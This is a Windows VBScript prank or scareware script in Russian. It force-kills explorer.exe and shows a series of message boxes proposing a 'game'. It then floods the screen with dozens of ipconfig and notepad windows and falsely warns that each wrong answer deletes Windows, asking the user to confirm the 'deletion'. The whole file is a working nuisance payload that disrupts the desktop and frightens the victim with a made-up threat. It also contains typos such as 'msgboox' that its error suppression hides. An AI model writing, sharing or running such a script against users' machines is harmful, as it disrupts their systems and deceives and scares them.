on error resume next
set t=createobject("Wscript.Shell")
set kill = createobject("wscript.shell")
kill.run"taskkill /f /im explorer.exe",0
msgbox"привет друг мой",16,"......"
msgbox"давай сыграем",16,"......"
msgbox"в одну игру",16,"......"
msgbox"ты должен ответить",16,"......"
msgbox"да или нет",32+4,"......"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"notepad"
t.run"notepad"
t.run"notepad"
t.run"notepad"
t.run"notepad"
t.run"notepad"
t.run"notepad"
t.run"notepad"
t.run"notepad"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"hellp"
t.run"ipconfig"
t.run"ipconfig"
t.run"notepad"
t.run"notepad"
msgbox"!!!НЕПРАВИЛЬНО!!!",16,"......"
msgbox"каждый неправельный ответ равен удалению винды",16,"!!!!!!!!!!!"
msgboox"потдвердите удаление Wendows",32+5,"удаление"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"
t.run"ipconfig"